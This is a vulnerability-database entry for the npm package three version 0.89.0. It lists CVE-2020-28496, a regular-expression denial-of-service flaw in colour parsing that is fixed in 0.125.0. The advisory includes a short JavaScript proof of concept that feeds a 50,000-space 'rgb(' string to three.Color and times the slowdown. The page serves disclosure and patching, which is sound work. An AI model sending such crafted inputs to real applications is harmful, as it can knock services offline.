Staging Environment: Content and features may be unstable or change without notice.
Search for packages
Package details: pkg:npm/three@0.89.0
purl pkg:npm/three@0.89.0
Next non-vulnerable version 0.125.0
Latest non-vulnerable version 0.137.0
Risk 4.0
Vulnerabilities affecting this package (1)
Vulnerability Summary Fixed by
VCID-8tyc-3c24-sbac
Aliases:
CVE-2020-28496
GHSA-fq6p-x6j3-cmmq
This affects the package three before 0.125.0. This can happen when handling rgb or hsl colors. PoC: var three = require('three') function build_blank (n) { var ret = "rgb(" for (var i = 0; i < n; i++) { ret += " " } return ret + ""; } var Color = three.Color var time = Date.now(); new Color(build_blank(50000)) var time_cost = Date.now() - time; console.log(time_cost+" ms")
0.125.0
Affected by 0 other vulnerabilities.
Vulnerabilities fixed by this package (0)
Vulnerability Summary Aliases
This package is not known to fix vulnerabilities.

Date Actor Action Vulnerability Source VulnerableCode Version
2026-06-12T17:33:38.161086+00:00 GitLab Importer Affected by VCID-8tyc-3c24-sbac https://gitlab.com/gitlab-org/advisories-community/-/blob/main/npm/three/CVE-2020-28496.yml 38.6.0